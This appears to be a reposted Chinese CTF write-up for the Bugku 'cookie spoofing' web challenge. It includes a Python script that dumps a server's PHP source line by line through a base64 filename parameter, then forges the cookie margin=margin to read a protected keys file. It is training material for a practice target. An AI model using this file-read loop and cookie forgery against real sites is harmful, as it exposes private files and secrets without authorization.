Bugku——cookie欺骗
来源:互联网 发布:手机淘宝有免费装修 编辑:程序博客网 时间:2024/06/06 05:02
看到url上的参数有base64,解码发现是key.txt
把改参数换成index.php,观察发现line按行返回
所以自己练练手写了个脚本跑出来
#!/usr/bin/env python# -*- coding: utf-8 -*-# @Date : 2017-10-28 09:36:41# @Author : csu_vc# @Link : http://blog.csdn.net/csu_vcimport requestss=requests.Session()url='http://120.24.86.145:8002/web11/index.php'for i in range(1,20): payload={'line':str(i),'filename':'aW5kZXgucGhw'} a=s.get(url,params=payload).content content=str(a,encoding="utf-8") print(content)
获得源码
error_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>
构造cookie margin=margin 然后读keys.php即可
阅读全文
0 0
- Bugku——cookie欺骗
- Bugku——web6
- cookie欺骗
- cookie 欺骗
- cookie欺骗
- COOKIE欺骗
- COOKIE欺骗
- COOKIE欺骗
- Cookie欺骗
- Cookie欺骗
- Bugku——成绩单(web)
- cookie 欺骗 与 cookie 注入
- 什么是cookie欺骗
- cookie欺骗教程
- Cookie欺骗原理
- COOKIE欺骗(上)
- COOKIE欺骗(下)
- cookie欺骗初探
- 后台与前端的联系
- 【ubuntu】安装cudnn
- vim 快捷键记录
- (Linux)mysql设置数据库编码为utf-8方法以及遇到的一些问题
- Java 基本算法实现
- Bugku——cookie欺骗
- 陈越姥姥第一节数据结构课,printN
- Django中多对多表的创建
- 文件的分离以及合并
- Struts2相关面试题
- AHOI 2005 洗牌(扩展欧几里德)
- 北邮电教授思想洗礼之不二之选TGB
- OPPO家族将再添新人 网友猜测哪位文艺男神
- 如何用vivo X7拍美食深夜报复社会!